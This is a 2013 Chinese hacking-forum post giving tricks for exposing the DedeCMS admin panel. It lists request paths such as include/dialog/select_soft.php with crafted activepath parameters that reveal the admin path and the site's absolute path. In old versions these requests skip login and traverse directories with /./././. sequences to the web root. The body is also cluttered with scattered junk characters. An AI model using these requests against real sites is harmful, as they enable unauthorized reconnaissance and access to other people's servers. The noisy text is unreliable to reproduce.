找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2218|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理0 e$ B3 Z5 B) |7 A, {6 K

, e" k6 E; A! {0 v4 R, U* G* k员帐号,新版本的就直接转向了后台.. H# n+ _% p  q2 w

, }# @! ]' c& B6 n$ l& \0 d6 ?* {) n1 x: o2.include/dialog/config.php会爆出后台管理路径' K: U* [0 q4 L+ e

, e( V: Q9 H& \0 |% h3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
) d- o5 i/ X% A7 N' d
( n" V7 B/ y/ ^6 y( F4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.4 m9 ]2 d* H: ~- s& w/ ~; c# f
" s) E! H7 K( R- ^# `  @5 Q
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉9 W7 B1 r. m5 V0 x. _

4 ?' v5 r& N; T* Q' ^到根目录去.不过这些版本的访问地址有些不同.2 t/ W) D5 t& Y$ I0 b8 o) R
地址为require/dialog/select_soft.php?activepath=/././././././././
0 Y2 g/ b) V  I: U6 h% g2 z
( z+ g0 |  {6 V1 Ninclude\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
2 q5 |6 _; q3 Q/ x6 N, M存在相同问题的文件还有1 h1 O- @/ w% v2 f- F
include\dialog\select_images.php6 b  s6 _( i  c. g: E
include\dialog\select_media.php6 m6 b( W; l" P% I  U6 s7 m+ M0 i  o
include\dialog\select_templets.php​- R' W" U- i9 ?; r( @4 H9 {7 O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表